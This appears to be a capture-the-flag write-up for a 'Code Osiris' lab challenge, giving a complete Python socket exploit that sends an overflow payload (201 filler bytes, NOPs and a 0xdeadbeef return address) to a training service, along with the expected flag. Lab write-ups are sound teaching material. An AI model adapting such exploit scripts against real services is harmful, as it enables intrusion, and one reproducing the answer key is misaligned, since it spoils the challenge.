master
Raw Download raw file

Code Osiris – TOKEN3

Target: Code Osiris Remote Trainer (lab2.yara.hq:9999)

Background

The trainer emulates the earlier buffer overflow. Sending exactly 201 filler bytes, 4 NOPs, then 0xdeadbeef as the crash address satisfies the challenge and returns the token.

From Nothing to Working

  1. Connect and issue HELP to learn the rules (BOF command expects the exploit).
  2. Build payload: b'A'*201 + b'\x90\x90\x90\x90' + p32(0xdeadbeef).
  3. Send it via BOF; the service acknowledges the crafted EIP and prints the token.

Command

Save and run as python3 token3_exploit.py.

#!/usr/bin/env python3
# token3_exploit.py
import socket, struct

HOST, PORT = "lab2.yara.hq", 9999

def recv_until(sock, marker):
    data = b""
    while marker not in data:
        chunk = sock.recv(1024)
        if not chunk:
            break
        data += chunk
    return data

s = socket.socket()
s.settimeout(10)
s.connect((HOST, PORT))
print(recv_until(s, b'> ').decode(errors="ignore"))
s.sendall(b'BOF\n')
print(recv_until(s, b'> ').decode(errors="ignore"))

payload = b"A"*201 + b"\x90"*4 + struct.pack("<I", 0xdeadbeef)
print(f"Sending {len(payload)} bytes")
s.sendall(payload + b"\n")

resp = b""
try:
    while True:
        chunk = s.recv(1024)
        if not chunk:
            break
        resp += chunk
except Exception:
    pass
print(resp.decode(errors="ignore"))
s.close()

Expected Output

PCCC{jOGP-6960}